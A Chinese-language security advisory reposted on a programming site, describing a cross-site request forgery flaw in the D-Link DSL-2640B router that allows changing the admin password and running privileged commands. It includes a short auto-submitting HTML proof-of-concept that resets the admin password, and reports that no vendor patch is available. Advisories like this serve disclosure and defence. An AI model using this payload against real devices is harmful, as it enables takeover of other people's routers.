发布日期:2012-02-21
更新日期:2012-02-22受影响系统:
D-Link DSL-2640B
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52096D-Link DSL-2640B是集成了调制解调器和路由器的多功能产品。D-Link DSL-2640B在实现上存在跨站请求伪造漏洞,攻击者可利用此漏洞在受影响设备上运行特权命令,更改配置、造成拒绝服务或注入任意脚本代码。<*来源:Ivano Binetti
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://www.example.com:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.dlink.com/Horde 3.3.12后门任意PHP代码执行漏洞Xavi 7968 ADSL路由器多个远程安全漏洞相关资讯 D-Link
- 多个D-Link产品UPnP缓冲区溢出漏洞 (07/29/2015 13:27:45)
- D-Link DIR-601身份验证绕过漏洞 (05/05/2015 14:10:55)
- 多个D-Link产品HNAP命令远程权限提 (04/22/2015 16:56:15)
| - 多个D-Link产品HTTP缓冲区溢出漏洞 (07/29/2015 13:27:16)
- D-Link和趋势网络路由器发现远程执 (04/30/2015 07:44:07)
- D-Link DIR-645命令注入及栈缓冲区 (03/04/2015 06:55:27)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
|
易网时代-编程资源站